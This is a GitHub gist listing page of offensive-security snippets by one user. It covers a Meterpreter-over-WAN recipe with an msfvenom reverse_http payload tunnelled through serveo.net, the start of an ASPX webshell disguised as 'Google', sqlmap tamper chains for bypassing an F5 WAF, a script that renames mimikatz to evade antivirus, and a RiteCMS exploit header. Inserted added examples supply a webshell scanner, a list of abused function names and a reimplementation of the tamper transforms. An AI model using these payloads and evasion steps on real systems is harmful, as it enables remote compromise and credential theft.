Faisal Fs ⚔️ faisalfs10x
@faisalfs10x
faisalfs10x / reverse_http_80.md
Created October 11, 2019 12:14 — forked from pawiromitchel/reverse_http_80.md
Meterpreter over WAN

Start the tunnel

autossh is used for a persistent SSH session (it re-establishes the tunnel when the connection drops).

autossh -R trustme:80:localhost:80 serveo.net

Generate the payload

msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_http LHOST=trustme.serveo.net LPORT=80 --bad-chars "\x00" --encoder x86/shikata_ga_nai --format exe --out $PWD/trustme.exe

Listen for incoming connections

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LHOST 0.0.0.0;set LPORT 80;run;"

@faisalfs10x
faisalfs10x / cengkerang.aspx
Created January 27, 2021 13:20
try custom
<%@ Page Language="C#" %>
<%@ Import namespace="System.Diagnostics"%>
<%@ Import Namespace="System.IO" %>
<script runat="server">
private const string mangga = "@lololo";
private const string kepala = "<html>\n<head>\n<title>Google</title>\n<style type=\"text/css\"><!--\nbody,table,p,pre,form input,form select {\n font-family: \"Lucida Console\", monospace;\n font-size: 88%;\n}\n-->\n</style></head>\n<body>\n";
private const string kaki = "</body>\n</html>\n";
/// <summary>
///
@faisalfs10x
faisalfs10x / router_b310.py
Created February 11, 2021 05:50
blacklist MAC address
#!/usr/bin/env python
# Faisalfs10x
import time, subprocess
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.firefox.options import Options
from datetime import datetime
def main():
@faisalfs10x
faisalfs10x / seclist_malicious.txt
Last active February 12, 2021 14:26
strings for finding backdoor shells, rootkits, botnets, and exploitable functions
# strings for finding backdoor shells, rootkits, botnets, and exploitable functions
# grep -Rn "shell *(" /var/www
exec
passthru
shell_exec
system
phpinfo
base64_decode
chmod
mkdir
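As an added example (not part of the gist above), the following scanner turns the string list into something slightly stronger than the `grep -Rn` one-liner: it only flags a name when it is followed by an opening parenthesis, so the word `system` in a comment is not a hit but `system (` is, and it weights the classic `eval(<decoder>(...))` chain higher than an isolated call. The web root written by `make_sample_tree()` is constructed for the demo; the function names `scan_file`, `scan_tree`, `score` and the extra entries in `SUSPICIOUS_FUNCS` (eval, assert, popen, proc_open, gzinflate, str_rot13) are this example's additions.

```python
#!/usr/bin/env python3
"""Scan a web root for PHP files calling functions commonly abused by webshells.

Added example for the string list above; not the gist's own code. The sample
files written by make_sample_tree() are constructed for the demo.
"""
import re
import tempfile
from collections import Counter
from pathlib import Path

# Names from the list above plus the usual eval/assert and decoder family.
SUSPICIOUS_FUNCS = [
    "exec", "passthru", "shell_exec", "system", "phpinfo", "base64_decode",
    "chmod", "mkdir", "eval", "assert", "popen", "proc_open", "gzinflate",
    "str_rot13",
]

# Name followed by optional whitespace and '(' so that a call like
# `system (` matches but the bare word inside prose or a comment does not.
# PHP function names are case-insensitive, hence IGNORECASE.
FUNC_RE = re.compile(
    r"\b(" + "|".join(map(re.escape, SUSPICIOUS_FUNCS)) + r")\s*\(",
    re.IGNORECASE,
)
# The classic obfuscation chain: eval(<decoder>(...)).
CHAIN_RE = re.compile(
    r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(",
    re.IGNORECASE,
)
PHP_EXTS = {".php", ".phtml", ".php3", ".php5", ".inc"}


def scan_file(path: Path) -> dict:
    """Return {call_name: count} for one file.

    The pseudo-key "eval+decoder" counts eval(<decoder>(...)) chains.
    """
    text = path.read_text(errors="replace")
    hits = Counter(m.group(1).lower() for m in FUNC_RE.finditer(text))
    chains = len(CHAIN_RE.findall(text))
    if chains:
        hits["eval+decoder"] = chains
    return dict(hits)


def score(hits: dict) -> int:
    """Crude risk score: one point per call, five per eval+decoder chain."""
    return sum(5 * n if name == "eval+decoder" else n for name, n in hits.items())


def scan_tree(root: Path) -> list:
    """Scan every PHP file under root; return (relpath, score, hits), highest first."""
    results = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in PHP_EXTS:
            hits = scan_file(p)
            if hits:
                results.append((p.relative_to(root).as_posix(), score(hits), hits))
    results.sort(key=lambda r: r[1], reverse=True)
    return results


def make_sample_tree() -> Path:
    """Write a constructed web root: one benign file, one obvious shell, one non-PHP file."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "index.php").write_text("<?php echo 'hello'; mkdir('cache'); ?>\n")
    (root / "uploads").mkdir()
    (root / "uploads" / "c.php").write_text(
        "<?php\n"
        "if (isset($_POST['x'])) { eval(base64_decode($_POST['x'])); }\n"
        "echo shell_exec($_GET['cmd']);\n"
        "system($_GET['c']);\n"
    )
    (root / "readme.txt").write_text("system( appears here but .txt is not scanned\n")
    return root


if __name__ == "__main__":
    for rel, s, hits in scan_tree(make_sample_tree()):
        print(f"{s:3d}  {rel}  {hits}")
```

Run it against a real web root with `scan_tree(Path("/var/www"))`; treat the score as a triage order, not a verdict, since legitimate CMS code calls `mkdir` and `base64_decode` too.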
@faisalfs10x
faisalfs10x / sqlmap-tamper-scripts-evaluation.md
Created February 15, 2021 02:55 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The table below represents the results of tests launched against an F5 Big-IP ASM WAF appliance in its XX version of YY and ZZ version of XY.

Below names are to be passed to the --tamper= parameter of sqlmap.

The Violation Rating column gives the dominant rating among the top 20 requests observed by F5 in its Security >> Event Logs : Application : Requests view.

The scale is 0-5.

https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
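To see what the WAF actually receives for a given `--tamper=` chain, here is an added example (not sqlmap's own code; its scripts live under `tamper/` in the sqlmap repository and expose `tamper(payload, **kwargs)`) that re-implements a handful of the transforms listed above in simplified form. The function names match the sqlmap script names; `chain()`, `parse_tamper_arg()`, the `KEYWORDS` set and the list-order application of the chain are assumptions of this demo, and the real scripts handle more cases (for instance, `space2comment` in sqlmap leaves quoted strings alone).

```python
#!/usr/bin/env python3
"""Simplified re-implementations of a few sqlmap tamper transforms.

Added example for the tamper list above, not sqlmap's code. Each function has
the shape tamper(payload, rng) and returns the rewritten payload; chain() applies
them in list order (an assumption of this demo).
"""
import random
import re
from typing import Callable, Dict, List, Optional

# Keywords whose case randomcase() is allowed to flip (SQL keywords are
# case-insensitive; identifiers such as table names may not be on Linux MySQL).
KEYWORDS = {"and", "or", "select", "union", "all", "from", "where", "order",
            "by", "null", "like", "between", "not", "limit", "sleep"}


def space2comment(payload: str, rng=None) -> str:
    """'1 AND 1=1' -> '1/**/AND/**/1=1': inline comments instead of spaces."""
    return payload.replace(" ", "/**/")


def space2plus(payload: str, rng=None) -> str:
    """Spaces become '+', which the server's URL decoder turns back into spaces."""
    return payload.replace(" ", "+")


def equaltolike(payload: str, rng=None) -> str:
    """'a=b' -> 'a LIKE b', defeating signatures keyed on '='."""
    return re.sub(r"\s*=\s*", " LIKE ", payload)


def apostrophemask(payload: str, rng=None) -> str:
    """Replace ' with the percent-encoded UTF-8 full-width apostrophe."""
    return payload.replace("'", "%EF%BC%87")


def charencode(payload: str, rng=None) -> str:
    """Percent-encode every character, including ones that need no encoding."""
    return "".join("%%%02X" % ord(ch) for ch in payload)


def between(payload: str, rng=None) -> str:
    """'a>b' -> 'a NOT BETWEEN 0 AND b'; 'a=b' -> 'a BETWEEN b AND b'."""
    payload = re.sub(r"\s*>\s*(\S+)", r" NOT BETWEEN 0 AND \1", payload)
    payload = re.sub(r"\s*=\s*(\S+)", r" BETWEEN \1 AND \1", payload)
    return payload


def randomcase(payload: str, rng: Optional[random.Random] = None) -> str:
    """Randomise the case of each letter of every SQL keyword."""
    rng = rng or random.Random()

    def flip(m: re.Match) -> str:
        word = m.group(0)
        if word.lower() not in KEYWORDS:
            return word
        return "".join(ch.upper() if rng.random() < 0.5 else ch.lower() for ch in word)

    return re.sub(r"[A-Za-z]+", flip, payload)


TAMPERS: Dict[str, Callable[[str, Optional[random.Random]], str]] = {
    "space2comment": space2comment, "space2plus": space2plus,
    "equaltolike": equaltolike, "apostrophemask": apostrophemask,
    "charencode": charencode, "between": between, "randomcase": randomcase,
}


def parse_tamper_arg(arg: str) -> List[str]:
    """Accept 'a,b,c' or '--tamper=a,b,c' as typed on the sqlmap command line."""
    arg = arg.split("=", 1)[1] if arg.startswith("--tamper=") else arg
    return [n.strip() for n in arg.split(",") if n.strip()]


def chain(payload: str, names: List[str], seed: Optional[int] = None) -> str:
    """Apply the named transforms in order; seed makes randomcase reproducible."""
    rng = random.Random(seed)
    for name in names:
        if name not in TAMPERS:
            raise ValueError(f"unknown tamper script: {name}")
        payload = TAMPERS[name](payload, rng)
    return payload


if __name__ == "__main__":
    probe = "' OR 1=1 ORDER BY 2"
    for spec in ("space2comment,equaltolike", "apostrophemask,space2plus", "between", "charencode"):
        print(f"{spec:30s} {chain(probe, parse_tamper_arg(spec))}")
```

Order matters: `apostrophemask` followed by `charencode` double-encodes the `%` signs, which is the kind of interaction the evaluation table above is implicitly measuring for each combination.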
@faisalfs10x
faisalfs10x / pwd2NTLM.py
Created April 17, 2021 13:40
plaintext password to NTLM hash for password auditing
import hashlib
import argparse
parser = argparse.ArgumentParser(description='Password to NTLM')
parser.add_argument("-w","--wordlist",required=True, help = "wordlist file to be converted to NTLM")
args = parser.parse_args()
wordfile = args.wordlist
total_converted = 0
f = open(wordfile, "r")
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but that also changes the command syntax and the documentation would need adapting, so it has not been done here; try it if the target's AV still detects mimikatz after running this script.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/candycrush
# Rewrite only the project files; skip .git so the clone's object store is left untouched.
find windows/ -type f -not -path '*/.git/*' -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -not -path '*/.git/*' -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
@faisalfs10x
faisalfs10x / RiteCMS - Arbitrary File Overwrite (Authenticated).txt
Last active December 22, 2021 10:23
# RiteCMS version 3.1.0 suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the cap…
# Exploit Title: RiteCMS - Arbitrary File Overwrite (Authenticated)
# Date: 2021-07-25
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
@faisalfs10x
faisalfs10x / squid_proxy_tutorial.md
Last active October 21, 2021 14:44 — forked from jackblk/squid_proxy_tutorial.md
Tutorial on how to setup a squid proxy with authentication.

Note

This tutorial is for Ubuntu and Squid 3. On current Ubuntu releases the package is simply `squid`; `squid3` was the older, transitional package name. Use AWS, Google Cloud, DigitalOcean or any provider that offers Ubuntu to follow this tutorial.

Install squid & update

sudo apt-get update -y
sudo apt-get install squid3 -y
sudo apt-get install apache2-utils -y